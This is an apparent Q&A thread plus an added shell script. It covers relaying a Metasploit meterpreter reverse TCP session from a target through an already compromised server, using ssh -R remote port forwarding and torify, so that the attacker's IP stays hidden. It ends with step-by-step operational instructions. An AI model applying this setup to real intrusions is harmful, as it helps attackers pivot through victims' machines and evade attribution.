
First of all, I want to say that my issue is not about the 'Portfwd' option of the meterpreter: https://www.offensive-security.com/metasploit-unleashed/portfwd/

Let's say I have access to 2 computers:
- Computer A is mine and is running linux.
- Computer B is a compromised host and is also running linux.
- Computer C is the one I want to compromise.

I am using the Metasploit framework for this purpose. How can I set up a reverse TCP connection from C to B and then connect from A to B to grab the meterpreter session? The thing is, I don't want B to know the IP address of A at any point. That is why it's A which will have to start the connection (using proxychains or any other program to hide its real IP).

First I tried to reproduce this problem using netcat, but maybe I have misunderstood something there:
- Computer A is running a netcat server on port 4444: nc -l -p 4444 (because A will run the meterpreter server).
- Computer C will connect to B on port 8888: nc 'B' 8888 (because C will execute the payload and will connect to the compromised server, so it has no link with my real IP).
- Computer B will have to set up a netcat listener on port 8888 to accept a TCP connection from C (I am not sure about this one).

Now my question is: how can I get the connection between B and A without B knowing the IP address of A?

I tried to use ssh to do a local port forwarding from A to B:
torify ssh -NL 4444:localhost:8888 B
but it is telling me that port 4444 is already in use (by the nc listener on A).
I drew a simple scheme so maybe it will be clearer; the following scheme is what I would like to have: (image: port forwarding)

Django

1 Answer


So, you want to forward port B:8888 to A:4444 from server A:

A:$ ssh -R 8888:localhost:4444 B

This opens port 8888 listening on B and forwards connections to port 4444 on A, where your server is. This works if the ssh server in B has the configuration option GatewayPorts set to yes.

If GatewayPorts is set to clientspecified, you could use one of the following commands:

A:$ ssh -R  :8888:localhost:4444 B
A:$ ssh -R *:8888:localhost:4444 B

GatewayPorts unset or set to no binds the socket to localhost, preventing the remote forwarding from working.

xae
  • I forgot to mention that I also tried this solution, but when I do that, even if port 8888 appears open on B (using netstat), it is not when I try to connect from A to B. It says 'connection refused', which makes me think the port is closed (nmap also said the port looks closed). And I know it is not a firewall issue, since I can open the same port using a netcat listener and I will be able to connect to it from A this time. If it helps, B is a virtual private server. – Django Apr 03 '17 at 20:44
  • Adjust the configuration of the ssh server in B to set the option GatewayPorts to "yes". – xae Apr 03 '17 at 23:03
  • You were right, this was the only thing missing here! Now it is working like a charm, thanks! – Django Apr 03 '17 at 23:22
  • Answer edited to include info about GatewayPorts – xae Apr 03 '17 at 23:37
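The behaviour the answer and the comments describe (a forward that shows up in netstat on B but is refused from outside, because sshd bound it to loopback) can be predicted and checked without touching a live server. The following is an added example, not code from the question or the answer: `remote_forward_bind` predicts, from the GatewayPorts value on B and the `-R` argument given on A, which address sshd will bind the forward to, following the rules in sshd_config(5) (no: always loopback; yes: always the wildcard address; clientspecified: whatever bind_address the client sent) and ssh(1) (no bind_address means "localhost", an empty or `*` bind_address means all interfaces). `listener_scope` then classifies a port from `ss -ltn` or `netstat -ltn` output as loopback-only or externally bound, which is the check Django needed after seeing the port "open" in netstat. The listener table at the bottom is constructed sample output, not captured from a real host.

```shell
#!/bin/sh
# Added example (not part of the original question or answer).
#
# remote_forward_bind GATEWAYPORTS SPEC
#   SPEC is the ssh -R argument: [bind_address:]port:host:hostport
#   Prints: loopback | wildcard | <specific bind address>
remote_forward_bind() {
    gw=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    spec=$2
    # A bind_address is present iff the spec has three colons;
    # ":8888:localhost:4444" (empty bind_address) still counts.
    ncolon=$(printf '%s' "$spec" | tr -cd ':' | wc -c | tr -d ' ')
    if [ "$ncolon" -ge 3 ]; then
        bind=${spec%%:*}      # text before the first colon, possibly empty
        hasbind=1
    else
        bind=""
        hasbind=0
    fi
    case "$gw" in
        yes)
            # sshd_config(5): "yes" forces every remote forward onto the
            # wildcard address, even if the client asked for a specific one.
            echo wildcard ;;
        clientspecified)
            if [ "$hasbind" -eq 0 ]; then
                echo loopback     # ssh(1) sends "localhost" when no bind_address is given
            elif [ -z "$bind" ] || [ "$bind" = '*' ]; then
                echo wildcard     # ssh(1) sends "" for an empty or "*" bind_address
            elif [ "$bind" = localhost ] || [ "$bind" = 127.0.0.1 ] || [ "$bind" = '::1' ]; then
                echo loopback
            else
                echo "$bind"
            fi ;;
        *)
            # "no" or unset: sshd ignores the requested address and binds loopback,
            # which is why the forward looked open on B but was refused from A.
            echo loopback ;;
    esac
}

# listener_scope PORT   (reads `ss -ltn` or `netstat -ltn` output on stdin)
#   Prints: none | loopback | external
listener_scope() {
    awk -v port="$1" '
        $1 == "LISTEN" || $NF == "LISTEN" {
            # The local address is the first field ending in ":<port>";
            # the peer column ("0.0.0.0:*") never matches a numeric port.
            for (i = 2; i <= NF; i++) {
                if ($i ~ (":" port "$")) {
                    addr = substr($i, 1, length($i) - length(port) - 1)
                    if (addr == "127.0.0.1" || addr == "[::1]" || addr == "::1" || addr == "localhost") {
                        if (scope != "external") scope = "loopback"
                    } else {
                        scope = "external"   # 0.0.0.0, *, [::], or a real interface address
                    }
                    break
                }
            }
        }
        END { print (scope == "" ? "none" : scope) }'
}

# Constructed `ss -ltn` output for B: sshd bound the forward to loopback only.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    127.0.0.1:8888      0.0.0.0:*
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*'

printf '%s\n' "$SAMPLE_SS" | listener_scope 8888                 # loopback
printf '%s\n' "$SAMPLE_SS" | listener_scope 22                   # external
remote_forward_bind no  8888:localhost:4444                      # loopback
remote_forward_bind yes 8888:localhost:4444                      # wildcard
remote_forward_bind clientspecified 8888:localhost:4444          # loopback
remote_forward_bind clientspecified :8888:localhost:4444         # wildcard
```

On a real engagement the sequence is: start the handler on A, open the forward from A with `torify ssh -R 8888:localhost:4444 B` (or the `:8888:` form when B has clientspecified), then on B run `ss -ltn | listener_scope 8888` and expect `external` before pointing C's payload at B:8888. A result of `loopback` means GatewayPorts on B still needs changing, exactly as in the comments above.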